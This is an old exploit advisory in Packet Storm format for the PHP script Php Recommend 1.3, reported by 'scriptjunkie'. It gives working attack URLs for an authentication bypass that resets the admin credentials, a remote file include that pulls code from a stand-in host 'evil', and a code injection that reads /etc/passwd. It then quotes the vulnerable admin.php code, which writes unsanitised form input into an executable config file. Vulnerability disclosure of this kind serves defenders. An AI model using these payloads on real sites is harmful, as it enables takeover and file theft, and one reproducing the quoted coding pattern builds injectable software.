PHP Recommend 1.3 Bypass / Inclusion / Injection

2009-05-11T00:00:00
ID PACKETSTORM:77405
Type packetstorm
Reporter scriptjunkie
Modified 2009-05-11T00:00:00

Description

                                        
                                            `Php Recommend <=1.3 Authentication Bypass/Remote File Include/Code Injection Exploits  
  
  
Author: scriptjunkie scriptjunkie.1 {nospam} googlemail {nospam} com  
Condition: RFI: allow_url_fopen = On  
code injection: magic_quotes_gpc = Off  
  
Exploits:  
Authentication Bypass:  
change admin username and password:  
vulnerable.com/admin.php?submit=submit&form_admin_user=USERNAME&form_admin_pass=PASSWORD  
  
RFI:  
vulnerable.com/admin.php?submit=submit&form_include_template=http://evil/evil.php  
  
Code Injection:  
vulnerable.com/admin.php?submit=submit&form_aula=';readfile('/etc/passwd');'  
  
  
Vulnerable code in "admin.php":  
  
if($submit){  
$a = "'";  
$b = "<";  
$c = ">";  
$d = "";  
$content = "".$b."?php  
// Php Recommmend  
// Created By Frax.dk  
// GNU Licens  
// Please do not delete this text  
$".$d."page = '".$form_page."';  
$".$d."include_template = '".$form_include_template."';  
$".$d."cap = '".$form_cap."';  
$".$d."title = '".$form_title."';  
$".$d."aula = '".$form_aula."';  
$".$d."language = '".$form_language."';  
$".$d."admin_user = '".$form_admin_user."';  
$".$d."admin_pass = '".$form_admin_pass."';  
  
// -- Maincore -- //  
  
include $".$d."include_template;  
?".$c."";  
  
$file_name = "phpre_config.php";  
$file = $file_name;  
$create_file = fopen($file, "w+");  
  
if(!$create_file){die("<td><span style='color:red;'><? echo $error1; ?></span></td>\n");}  
  
//attempt to write basic content to the file  
if (fwrite($create_file, $content) === FALSE) {  
echo "<td><span style='color:red;'><? echo $error2; ?></span></td>\n";  
}else{echo "Succes";}  
fclose($create_file);  
  
  
which is reached since the authentication in server.php:  
if($user == $admin_user && $admin_pass == $pass){  
$error = "false";  
}else{  
setcookie("phpre_user", "", time()-3600);  
setcookie("phpre_pass", "", time()-3600);  
$error = "true";  
}  
  
is not checked sufficiently.  
  
  
`